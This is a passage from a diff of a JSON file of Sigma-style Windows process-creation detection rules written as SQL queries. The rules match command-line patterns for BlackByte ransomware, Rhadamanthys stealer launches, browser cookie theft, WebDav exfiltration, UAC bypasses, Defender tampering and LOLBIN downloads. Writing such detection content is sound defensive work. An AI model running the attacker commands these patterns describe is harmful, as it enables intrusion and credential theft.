LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "title": "New Generic Credentials Added Via Cmdkey.EXE", + "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate usage for administration purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "PUA - NirCmd Execution", + "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_pua_nircmd.yml" }, { - "title": "Hiding Files with Attrib.exe", - "id": "4281cb20-2994-4580-aa63-c8b86d019934", - "status": "test", - "description": "Detects usage of attrib.exe to hide files from users.", - "author": "Sami Ruohonen", + "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", + "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "status": "experimental", + "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", + "author": "TropChaud", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1218.011" ], "falsepositives": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'RUNDLL32.EXE' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_attrib_hiding_files.yml" + "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet", - "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.privilege_escalation", "attack.persistence", - "attack.t1546.001" + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", - "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "status": "test", + "description": "Detects suspicious process related to rasdial.exe", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%rasdial.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_rasdial_execution.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command", - "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "status": "test", - "description": "Detects presence of a potentially xor encoded powershell command", - "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", + "description": "Detects WMI script event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_xor_commandline.yml" + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "New Kernel Driver Via SC.EXE", - "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", - "status": "experimental", - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Execution of InstallUtil Without Log", + "id": "d042284c-a296-4988-9be5-f424fadcc28c", + "status": "test", + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ - "Rare legitimate installation of kernel drivers via sc.exe" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND NewProcessName LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_new_kernel_driver.yml" + "filename": "proc_creation_win_instalutil_no_log_execution.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "HackTool - SharpLDAPmonitor Execution", + "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" }, { - "title": "Process Reconnaissance Via Wmic.EXE", - "id": "221b251a-357a-49a9-920a-271802777cc0", + "title": "Greedy File Deletion Using Del", + "id": "204b17ae-4007-471b-917b-b917b315c5db", "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE 